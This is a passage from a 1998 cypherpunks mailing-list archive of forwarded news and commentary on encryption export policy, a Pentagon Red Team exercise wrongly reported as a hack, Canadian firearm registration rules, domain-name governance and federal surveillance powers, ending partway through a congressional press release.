       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 3 Oct 1998 12:27:55 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Wired News: Report of military personnel medical records hackis FALSE
Message-ID: <v0401171cb23c0c8e5281@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
From: Bridget973@aol.com
Date: Fri, 2 Oct 1998 22:10:54 EDT
To: ignition-point@majordomo.pobox.com
Mime-Version: 1.0
Subject: IP: Wired News: Report of military personnel medical records hack
is FALSE
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: Bridget973@aol.com

http://www.wired.com/news/news/technology/story/15372.html


                     Pentagon Takes Back Hack
                     Wired News Report

                     7:45 p.m.  1.Oct.98.PDT
                     The US Department of Defense said
                     Thursday last week's report of crackers
                     penetrating military Web sites and
                     altering soldiers' medical files were
                     inaccurate.

                     Instead, a "Red Team" of American
                     military computer experts carried out a
                     simulated attack designed to test the
                     security of the Pentagon's computer
                     networks, said a spokeswoman for the
                     Defense Department.

                     "The simulated attack is part of the
                     recent exercises to assess the danger to
                     unclassified material, such as personnel
                     records," Suzan Hansen said Thursday.

                     The confusion arose last week, when
                     Money told the Armed Forces
                     Communications and Electronics
                     Association Conference that crackers had
                     accessed a medical database in the
                     southeastern United States and changed
                     blood types in soldiers' records.

                     Hansen said that Money was merely
                     referring to a Red Team exercise, not a
                     real cyberattack.

                     At the conference, Money reportedly said
                     that the Red Team exercise prompted the
                     Pentagon to develop a more restrictive
                     security policy on the type of information
                     that will be stored in military computers
                     connected to the Internet.



--
bridget973@aol.com
Black Helicopters on the Horizon:
http://members.xoom.com/bridget973




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 3 Oct 1998 12:53:26 +0800
To: cryptography@c2.net
Subject: IP: Americans for Computer Privacy Call for Action in Congress
Message-ID: <v0401171fb23c0f4ff876@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Sat, 03 Oct 1998 09:14:11 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Americans for Computer Privacy Call for Action in Congress
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  US Newswire
http://www.usnewswire.com/topnews/Current_Releases/1002-121.txt

Americans for Computer Privacy Call for Action in Congress
U.S. Newswire
2 Oct 14:30

 Americans for Computer Privacy Call for Action in 106th Congress
 To: Assignment Desk, Daybook Editor, Technology Writer
 Contact: Sue Richard for Americans for Computer Privacy,
          202-625-1256, E-mail: suer(At)dittusgroup.com

   News Advisory:

   WHAT: Americans for Computer Privacy (ACP) will issue a coalition
         letter to House and Senate leaders urging legislation in the
         next Congress that will build on the reforms in encryption
         policy recently announced by the Administration. ACP will
         also report on the coalition's growth and future plans, as
         well as the response to its on-line advertising initiative.

   WHO:  ACP Executive Director Ed Gillespie; Rep. Bob Goodlatte
         (R-Va.); Rep. Zoe Lofgren (D-Calif.); Rep. Sam Gejdenson
         (D-Conn.); Rep. Rick White (R-Wash.); Sen. John Ashcroft
         (R-Mo.); Sen. Conrad Burns (R-Mont.); Sen. Ron Wyden
         (D-Ore.); Robert Holleyman, Business Software Alliance;
         Jerry Berman, Center for Democracy and Technology; and
         Grover Norquist, Americans for Tax Reform.

   WHEN:  Wednesday, Oct. 7, 11 a.m.

   WHERE: Room HC-7, U.S. Capitol,
          Washington, D.C.

   BACKGROUND: Since its formal launch in March 1998, ACP has worked
closely with Congress and the Administration on encryption policy
reform. While ACP acknowledges that progress has been made, the
coalition believes the encryption issue is far from resolved.
Americans for Computer Privacy brings together more than 100
companies and 40 associations representing financial services,
manufacturing, telecommunications, high-tech and transportation, as
well as law enforcement, civil-liberty, pro-family and taxpayer
groups. ACP supports policies that advance the rights of American
citizens to encode information without fear of government intrusion,
and advocates the lifting of current export restrictions on U.S.-made
encryption.

   For more information on ACP, please visit our website at
www.computer privacy.org. A cybercast of the press conference will be
available on the site on Thursday, Oct. 8.

 -0-
 /U.S. Newswire  202-347-2770/
 10/02 14:30

Copyright 1998, U.S. Newswire
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 3 Oct 1998 14:09:12 +0800
To: "Donna Ferolie" <Martin.P@parl.gc.ca>
Subject: Govt breaks the law.  They do it again!
Message-ID: <199810031856.OAA12855@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



THIS MESSAGE SENT AND/OR Cc'ed TO:

Paul Martin, Finance Minister <Martin.P@parl.gc.ca>
Anne McLellan, Justice Minister <McLellan.A@parl.gc.ca>
Gary Breitkreuz, Reform Party MP <Breitkreuz.G@parl.gc.ca>
Dr. Bernard Patry, Pierrefonds-Dollars MP <Patry.B@parl.gc.ca>
Le Qubecois Libre <libre@colba.net>
auditoire@montreal.src.ca
cypherpunks@toad.com
Sporting.Shooters.Association@adelaide.on.net
"Donna Ferolie"<teebee@sprint.ca>


Date: Fri, 2 Oct 1998 16:26:47 -0600
From: David A Tomlinson <nfadat@telusplanet.net>
Subject: Re: NEW ILLEGAL REQUIREMENTS

>Canadian Firearms@CFC   10/01/98 09:17 AM
>Bulletin No. 23

>Registration and the Firearms Identification Number

>You will receive a Registration Certificate for each firearm you
>register.  Each Registration Certificate will have a unique number.
>This will be the Firearms Identification Number (FIN) issued by the
>Registrar, head of the Canadian Firearms Registry. The FIN is the
>file number you will use for all contact with the office of the
>Registrar.  If your firearm has no serial number, or if the serial
>number, combined with other features of the firearm, is not enough
>to tell it apart from all other firearms, you will have to put the
>FIN on your firearm.  The Registrar will tell you if the FIN must
>be placed on your firearm.

The FIN will be required on nearly all firearms, as few of them have a
well-documented system of Serial numbers that is KNOWN and PROVABLE.  Many
manufacturers -- especially manufacturers of military firearms for export --
duplicate Serial numbers with monotonous regularity.  Others recycle the
numbers -- as Iver Johnson did, numbering 9,000,000 revolvers with a machine
capable of only 99,999 numbers before starting to recycle.  Others,
particularly Eastern manufacturers, use digits and/or letters that the
registration system cannot handle (Cyrillic letters, for example).

>Attaching the FIN to Your Firearm
>You will have to put the FIN on your firearm only if the firearm
>has no serial number or the serial number is not unique.

There is no way to tell whether or not a particular Serial number is UNIQUE.
The word "unique" designates an absolute --  That is, it is guaranteed that
there is NO other firearm of that type with that Serial number.  That is a
standard that is clearly unreachable.  The Serial number is an indicator,
but it can never be certified as "unique" because there is always at least
the problem of fraud in the factory producing one or more firearms with
duplicated Serial numbers.  


>If you
>have to put the FIN on your firearm, you have a choice of how you
>apply it in three situations:  1) if you own your firearm on
>December 1, 1998; 2) if your firearm was manufactured before
>December 1 and imported into Canada on or after December 1, 1998;
>or, 3) if you, as a licensed business, specially import the firearm
>for a short time only (such as a film company making a movie in
>Canada).  In these cases, you may attach a FIN using a special
>sticker provided by the Registrar or, you may permanently engrave
>or stamp the FIN on your firearm.

The above is a very muddled paragraph, which I split into two parts.  The
above section apparently identifies the three classes of firearms which can
be identified by the use of a permanent "sticky."  It offers the OPTION of
stamping of engraving the FIN on the "frame or receiver" of the firearm.


>  With all other firearms needing
>unique identification, you must permanently engrave or stamp the
>FIN.  In most cases, the FIN must be easy to read and on a visible
>part of the frame or receiver (see next CFC Bulletin for further
>details).  You will have 30 days from the issue date on the
>Registration Certificate to attach the special sticker to your
>firearm.  You will have 90 days from the issue date on the
>Registration Certificate to permanently engrave or stamp the FIN
>on your firearm.

This second half of the paragraph (above) requires engraving or stamping of
the FIN on all other classes of firearms, such as all firearms manufactured
after 01 Dec 98. 


>For more information, or for a copy of the Firearms Act, its
>regulations and other CFC publications, contact us at:

>1-800-731-4000 (Toll Free)
>Web site:  http://www.cfc-ccaf.gc.ca/
>E-mail:  canadian.firearms@justice.x400.gc.ca

Fortunately, all of this is apparently NULL AND VOID.  No such requirements
may be demanded by the CFC or CFR/FRAS unless they are:

1.  required by the legislation (C-68's Firearms Act or Criminal Code), or

2.  the subject of an Order in Council authorized to be made by the legislation.

The legislation apparently says nothing whatever about where or how the
Serial number must be on the firearm, and does not mention the Firearms
Identification Number concept at all; therefore, the above requirements are
apparently null and void as far as the legislation is concerned.

The legislation does not authorize the making of any regulation regarding
markings on firearms, and therefore the above rules apparently cannot be
created by Order in Council.

Once again, this is apparently a defective attempt to amend defective
legislation by false pretences, and an attempt by the CFC and CFR/FRAS to
legislate -- but legislation is beyond their power, so this entire set of
requirements is apparently null and void.

A copy of this is being sent to the CFC and to CFR/FRAS.  CFC and CFR/FRAS,
this is a demand for an explanation as to why this apparently illegal and
misleading information was published and distributed. 
Please reply to the Canadian Firearms Digest with all possible speed, and
either explain why you think you had the authority to publish it -- or
publish a retraction.

Dave Tomlinson, NFA  --  CLOG: all Conservative or Liberal Ottawa Governments

------------------------------






Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Sat, 3 Oct 1998 14:09:53 +0800
To: cypherpunks@toad.com
Subject: Re: Is the .to (Tonga) domain completely rogue and should be removed?
In-Reply-To: <Pine.LNX.4.03.9810021955160.28053-100000@BlackBox.elitehackers.org>
Message-ID: <m0zPRch-0003b7C@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain



>>[Tuvalu TLD put on hold]

>if you want the long version of it, join gthe NANOG list (North American
>Network Operators Group).. but basically, this TLD is mostly a spam/rogue
>TLD....

That is quite scary.

If someone outside the US uses a .COM or other generic TLD name, even
if the name has been used for years and is a, say, European trademark,
anyone in the US can register that name as a trademark, and Internic
will take the name away from the legitimate owner. You may say that's
ok because `generic' TLDs are de facto American, but now Internic even
decides to disable the name space of a sovereign state? If there is any
such thing as Infowar, I guess this must be it.

In case the upcoming EU regulation on unsolicited mailings has the effect
some claim it will, can Internic just declare .DE a spammer domain and
disable FITUG's address as well?

Dealing with contents is not any naming authority's business. It
wouldn't be even if you actually needed a domain to send spam.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 3 Oct 1998 18:38:50 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.9: Canada Frees Up Crypto--WIRED
Message-ID: <199810032339.QAA27717@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.9: Canada Frees Up Crypto--WIRED
Date: Fri, 2 Oct 1998 00:10:43 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.9: Canada Frees Up Crypto
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Friday October 2, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: WIRED News, September 1, 1998
http://www.wired.com

Canada Frees Up Crypto
http://www.wired.com/news/news/politics/story/15362.html

by
Matt Friedman, mwf@total.net

In a move that will almost certainly create friction between the US and
Canada, the Canadian government has released a new cryptography policy that
encourages the proliferation of powerful data-scrambling technologies.

The policy, announced Thursday by John Manley, the minister of industry,
makes it clear that Canadians will not have to submit to mandatory key
recovery, which would give the government access to all scrambled
communications. The document also heads off the establishment of a national
public key infrastructure.

"In terms of domestic policy, it couldn't be better," says David Jones,
president of Electronic Frontier Canada. "Industry Canada is essentially
saying that, domestically, you can pretty much do whatever you want with
cryptography."

An American civil liberties advocate was similarly impressed.

"It is great. It's a policy for the 21st century, as opposed to the US
government's policy update from last week, which is too little, too late,"
said Susan Landau, a cryptography policy expert and the co-author of
Privacy on the Line: The Politics of Wiretapping and Encryption.

Canada's new policy is a setback to the country's "signals intelligence"
spy agencies. Industry Canada had been under considerable pressure from the
intelligence and law-enforcement communities, both at home and in the
United States, to establish domestic crypto controls.

"The US has sent a number of delegations to Canada, a number of times, to
try and convince [the Canadian government], to go with a restrictive view,"
said David Banisar, policy director of the Electronic Privacy Information
Center in Washington, DC.

"The Canadians clearly said they were not interested."

Last winter, when Ottawa published a public white paper on cryptography and
solicited comments from the public and other branches of government, the
Canadian Security Intelligence Service said that it was pushing for a
public key-recovery plan.

The CSIS is concerned both with domestic and foreign intelligence, sort of
a combination of the FBI and CIA.

"The ability to decrypt messages and data has a significant impact on our
ability to monitor security threats to Canadians," said CSIS spokeswoman
Marcia Wetherup at the time. Reached for comment Thursday morning, Wetherup
said, "That continues to be the service's main concern at this time."

While the Canadian government has rejected controls on domestic crypto, it
is taking a wait-and-see attitude on exports. In the US, cryptography
exports are strictly regulated, on the grounds that the technology might be
used to conceal the communications of terrorists or hostile nations.

"The Commerce Department is not going to be happy," Landau said. A Commerce
Department official declined comment.

Under the new policy, Ottawa will continue to work within the framework of
the Wassenaar agreement. That document, an international treaty limiting
the spread of munitions technologies, is currently being renegotiated.

Sunny Handa, a cyberlaw specialist with the Montreal law firm Martineau
Walker, points out that the new policy will not alter existing regulations
governing the export of Canadian crypto technology or the re-export of
technology originating in the United States.

"The real issue now is export," he says. "That hasn't changed."

The new policy does, however, make the point that the Canadian government
will "deter the use [of crypto] in the commission of a crime," and in the
concealment of evidence. Moreover, existing search-and-seizure laws will
apply to encrypted messages. But Handa says that Industry Canada is simply
"throwing a bone to the police."

"Our search-and-seizure laws are pretty good right now," he says.
"Citizens' rights are protected, and law enforcement officials can do their
jobs. If Industry Canada has signaled that it's happy with them, we
probably won't see new legislation in this area for years."

"One way to view the issue of cryptography is as an issue of crime
prevention, rather than crime detection," said Landau. "As we enter the
wired world, cryptography will become extremely important to crime
prevention, and the Canadians recognize that."

Copyright (c) 1994-98 Wired Digital Inc.

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.













**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 3 Oct 1998 18:38:55 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.10: 'Deadbeat' Parents Database Goes on Line
Message-ID: <199810032339.QAA27729@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.10: 'Deadbeat' Parents Database Goes on Line
Date: Fri, 2 Oct 1998 00:11:28 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.10: 'Deadbeat' Parents Database Goes on Line
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Friday October 2, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: CNN Interactive, September 30, 1998
http://www.cnn.com

National Registry to Track 'deadbeat' Parents Goes on Line:
The Federal Case Registry will track the 16 million U.S. parents who are
required to pay child support
http://www.cnn.com/US/9809/30/deadbeat.registry/


WASHINGTON (CNN) -- A new national registry aimed at helping keep track of
the 16 million U.S. parents required to pay child support goes on line
Thursday.

The Federal Case Registry is designed to help custodial parents who aren't
receiving child support track down the non-custodial parents who owe the
money.

Once the "deadbeat" parent is located, even in another state, officials can
ask his or her employer to withhold child support from paychecks, which the
employer is obligated to do under federal law.

"This is an exciting day of hope for children whose parents have abandoned
them financially," said U.S. Department of Health and Human Services
Secretary Donna Shalala in a statement.

HHS figures show that states now collect about 22 percent of the $50
billion in back child support owed each year. The new database is expected
to be particularly helpful in cases where the children live in a different
state than the deadbeat parent.

"Since one-third of all child support cases are interstate, we now can
confidently close the loopholes for parents escaping their financial
obligations," said Olivia Golden, an HHS assistant secretary.

Custodial parents can enter information about the deadbeat parent in the
registry. That information will then be checked against data in a separate
registry, the National Directory of New Hires, which includes records for
everyone who begins a new job.

Critics of the registry concept say that many custodial parents who try to
go after child support after a multi-year lapse won't have enough accurate
data to make a match.

Fathers' rights groups have also expressed concerns that the tracking
system could be used to invade the privacy of law-abiding parents. However,
Golden says the law that set up the registry prohibits unauthorized use of
the data.

Thirty-nine states will begin entering information into the registry
immediately. The remaining 11 states are expected to come on board during
1999.

Correspondent Jennifer Auther contributed to this report.

(c) 1998 Cable News Network, Inc.


--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.













**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 3 Oct 1998 18:38:55 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.11: Canada Weighs in on Crypto--CNET
Message-ID: <199810032339.QAA27741@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.11: Canada Weighs in on Crypto--CNET
Date: Fri, 2 Oct 1998 00:13:01 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.11: Canada Weighs in on Crypto--CNET
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Friday October 2, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: CNET News.con, October 1, 1998
http://www.news.com

Canada Weighs in on Crypto
http://www.news.com/News/Item/0,4,27044,00.html?st.ne.fd.mdh

By
Janet Kornblum, janetk@cnet.com
Staff Writer, CNET News.com

In a move aimed at encouraging e-commerce, the Canadian government today
introduced a new policy with relatively loose restrictions on the export of
encryption software.

The new encryption policy, introduced today in a speech by John Manley,
Canada's minister of industry, may be more notable for what it lacks: a
mandatory requirement for controversial key recovery and powerful
restrictions on strong encryption products.

Encryption software is used to put a digital lock on private communication.
To read an encrypted document, the recipient has to have a "key."

The controversy over encryption has been a classic case of business and
privacy interests vs. government.

On one hand, businesses and privacy advocates want to be able to develop
and sell products that are airtight as possible. On the other,
governments--primarily the United States--want to be able to prevent
outsiders from being able to digitally lock out law enforcement officials
from their communication and thwarting efforts to prosecute wired
criminals.

Though the White House has loosened its stance on the export of encryption
software, it still backs policies that make the practice difficult.

Canada's Manley, on the other hand, specifically said the country "will not
implement mandatory key recovery requirements or licensing regimes for
certification authorities or trusted third parties."

It does, however "encourage industry to establish responsible practices,
such as key recovery techniques for stored data and industry-led
accreditation of private sector certification authorities," he added.

The government also pledged to make it easier for Canadian firms to export
strong encryption products both by streamlining the export permit process
and by making sure Canada's regulations are not tighter than those of
competitors in other countries.

"The policy underscores that Canada is open for electronic business,"
Manley said. "We are encouraging the widespread use of strong encryption
and growth of export markets for Canadian technologies."

David Banisar, policy director for the Electronic Privacy Information
Center and an outspoken critic of the United States' tight export
restrictions, today applauded most of Canada's new policy.

"It definitely refutes the U.S.'s attempts to get Canada to restrict crypto
in many ways," Banisar said. "It allows Canadian companies to export
software pretty much of any size."

He added that Canada's policy could help influence more liberal European
rules on encryption exportation. "This won't force the U.S.'s hands, but
what it does is it further isolates the U.S.," he said.

However, Banisar did take exception to a proposal contained in the policy
statement today that says the government will introduce legislation that
specifically makes it "an offense to wrongfully disclose private encryption
key information and to use cryptography to commit or hide evidence of a
crime."

Making cryptography itself a special circumstance in the commission of a
crime is tantamount to adding special penalties for using "basic
instruments of communication" such as a telephone or a pen, Banisar said.

Unlike laws that single out the use of guns or other weapons specifically
designed to produce physical damage, "this is not a technology that creates
crimes," he said. "And because its intended use is going to be essentially
ubiquitous this could be an additional penalty that could apply to any kind
of crime."

Copyright (c) 1995-98 CNET, Inc.


--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.











**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 3 Oct 1998 19:13:57 +0800
To: cypherpunks@cyberpass.net
Subject: IP: CNS - Justice Department Seeks Expanded Power
Message-ID: <199810032339.QAA27752@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "A.C." <angie@computerhut.net>
Subject: IP: CNS - Justice Department Seeks Expanded Power
Date: Fri, 02 Oct 1998 00:13:37 -0700
To: ignition-point@majordomo.pobox.com

>Date: Thu, 01 Oct 1998 13:18:40 -0500
>From: Jim Groom <gs924jfj@mon-cre.net>
>To: Current Events <gs924jfj@mon-cre.net>
>Subject: CNS - Justice Department Seeks Expanded Power
>
>http://www.conservativenews.org/indepth/welcome.html
>
>Justice Department Seeks Expanded Power
>
>01 October, 1998
>
>By Ben Anderson
>CNS Staff Writer
>
>(CNS) The United States Justice Department is seeking to expand its
>authority and "obtain massive new enforcement powers" just days before a
>busy Congress scurries to finish business, according to Representative
>Bob Barr (R-GA). 
>
>If the Justice Department has its wishes, according to Barr, it could
>establish a "permanent FBI Police Force." The Justice Department is
>allegedly trying to get their "wish list" attached to appropriations
>bills to avoid public hearings or debate.
>
>Barr obtained a "wish list" by the Department which includes expanding
>definitions of terrorism to include domestic crimes unrelated to
>terrorism. The Department is also seeking to seize commercial
>transportation assets for federal use and the ability to commandeer
>personnel from other federal agencies without reimbursement. 
>
>"These requests belong in some bizarre conspiracy novel," Barr said,
>"not in serious legislative documents being circulated at the top levels
>of federal law enforcement."
>
>In addition to forcing telephone and Internet companies to divulge
>information on their customers, Justice Department officials are also
>seeking to expand wiretap authority to allow "roving" wiretaps, and
>wiretaps without any court authority, according to Barr. 
>
>"These proposals represent a sneak attack on the most cherished
>principles of our democracy. If they become a part of our law, freedom
>and privacy in America will be permanently and severely diminished,"
>Barr said. 
>
>Barr released information yesterday to expose the Justice Department's
>efforts. Barr spokesman Brad Alexander told CNS the department typically
>waits until the congressional atmosphere is clouded with lots of
>legislation to lobby sympathetic Congressmen.
>
>Alexander told CNS the wiretapping issue is something the Justice
>Department tries to expand at the end of every congressional session. 
>
>Three phone calls made to the Justice Department by CNS were not
>returned by press time.
>
>###
>----------------------------------------------------------------------

                              September 29, 1998
  
http://www.house.gov/barr/p_doj.html

                         BARR EXPOSES DEPARTMENT OF JUSTICE POWER GRAB

                    WASHINGTON, DC -- U.S. Representative Bob Barr (GA-7)
                    released today information exposing an effort by the
                    Department of Justice to obtain massive new enforcement
